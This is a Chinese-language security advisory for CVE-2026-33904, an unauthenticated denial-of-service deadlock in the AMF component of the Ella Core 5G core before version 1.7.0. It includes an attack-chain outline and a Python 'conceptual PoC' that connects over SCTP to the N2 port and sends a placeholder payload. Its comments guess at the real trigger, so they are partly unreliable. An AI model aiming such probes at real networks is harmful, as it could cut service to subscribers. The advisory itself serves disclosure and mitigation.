CVE-2026-33904 CVSS 6.5 中危

CVE-2026-33904 Ella Core拒绝服务漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33904

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ella Core

漏洞概述

Ella Core是一款专为私有网络设计的5G核心网软件。在1.7.0版本之前，其AMF（接入和移动性管理功能）的SCTP通知处理程序中存在死锁缺陷。该缺陷会导致整个AMF控制平面停止响应，必须重启进程才能恢复。攻击者若能访问N2接口，即可触发此死锁，导致Ella Core服务挂起，进而对所有订阅用户造成拒绝服务。

技术细节

该漏洞的根本原因在于AMF组件处理SCTP（流控制传输协议）通知时的逻辑错误。在特定条件下，SCTP通知处理程序未能正确管理资源锁或清理流程，导致死锁发生。一旦死锁触发，负责处理连接和移动性管理的控制平面线程将永久阻塞。由于AMF是5G核心网的关键组件，负责处理基站与核心网之间的N2接口信令，其挂起会导致新用户无法接入，现有用户无法移动或保持连接。攻击者无需认证即可利用此漏洞，只需向N2接口发送特制的SCTP数据包或触发特定通知流程，即可使系统陷入不可用状态。

攻击链分析

STEP 1

侦察

攻击者扫描网络，寻找暴露N2接口的Ella Core 5G核心网节点。

STEP 2

利用

攻击者无需认证，直接向N2接口发送特制的SCTP数据包，触发AMF中的SCTP通知处理程序死锁。

STEP 3

影响

AMF控制平面挂起，无法处理用户请求，导致所有订阅用户服务中断（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# This is a conceptual PoC for triggering the SCTP notification handler deadlock.
# It requires a target running a vulnerable version of Ella Core.

import socket
import sctp

TARGET_IP = "192.168.1.100"  # Replace with Ella Core N2 Interface IP
TARGET_PORT = 36412          # Standard SCTP port for N2 interface

def trigger_deadlock():
    print(f"[*] Attempting to connect to {TARGET_IP}:{TARGET_PORT} via SCTP...")
    
    try:
        # Create an SCTP socket
        sock = sctp.sctpsocket(socket.AF_INET, socket.SOCK_STREAM)
        
        # Attempt to establish association to the N2 interface
        sock.connect((TARGET_IP, TARGET_PORT))
        print("[+] Connection established.")
        
        # In a real exploit, specific malformed SCTP notifications or chunks
        # would be sent here to trigger the race condition in the handler.
        # For example, sending a rapid stream of SHUTDOWN or ABORT chunks
        # mixed with DATA chunks might trigger the stale-entry scan issue.
        
        # Simulating sending data that triggers the notification handler path
        message = b"\x00\x00\x00\x01"  # Placeholder for specific signaling message
        sock.sctp_send(message)
        
        print("[+] Payload sent. Check if AMF control plane hangs.")
        sock.close()
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    trigger_deadlock()

影响范围

Ella Core < 1.7.0

防御指南

临时缓解措施

在未完成升级前，建议通过网络访问控制列表（ACL）严格限制对N2端口的访问，阻断外部未授权IP对Ella Core的访问，从而降低被利用的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表